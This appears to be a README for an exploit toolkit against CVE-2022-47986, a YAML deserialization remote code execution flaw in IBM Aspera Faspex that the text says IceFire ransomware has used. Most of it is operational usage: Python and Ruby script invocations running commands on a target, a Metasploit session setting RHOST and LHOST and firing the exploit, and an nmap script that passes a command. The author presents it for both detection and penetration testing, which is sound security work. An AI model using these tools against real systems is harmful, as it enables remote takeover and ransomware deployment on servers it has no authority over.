This vulnerability is exploited in the wild. IceFire use this vulnerability to deploy the ransomware on targeted systems, i would like to help SOC/Blue teams to identify impacted systems and Pentesters/Red teams to exploit and report it.
I propose pure python and ruby scripts, metasploit and nmap modules to exploit the vulnerability that causes a RCE (Remote Code Execution) on IBM Aspera Faspex from YAML deserialization.
python3 CVE-2022-47986.py <target> <command>
# OR
chmod u+x CVE-2022-47986.py
./CVE-2022-47986.py https://aspera.faspax.local idruby CVE-2021-31166.rb
ruby CVE-2021-31166.rb <hostname> -c <command>
ruby CVE-2021-31166.rb aspera.faspax.local -c idmsf6 > use exploit/linux/http/ibm_aspera_faspex_rce_yaml_deserialization
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set RHOST 10.10.10.10
RHOST => 10.10.10.10
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > set LHOST 192.168.77.139
LHOST => 192.168.77.139
msf6 exploit(linux/http/ibm_aspera_faspex_rce_yaml_deserialization) > exploit
nmap -p 443 --script ibm-aspera-faspex-rce 172.17.0.2
nmap -p 443 --script ibm-aspera-faspex-rce --script-args "command=id" 172.17.0.2- IBM
- nvd.nist.gov
- Blog - Exploit
- thehackernews - exploited by icefire
- thehackernews - CISA KEV catalog
Licensed under the GPL, version 3.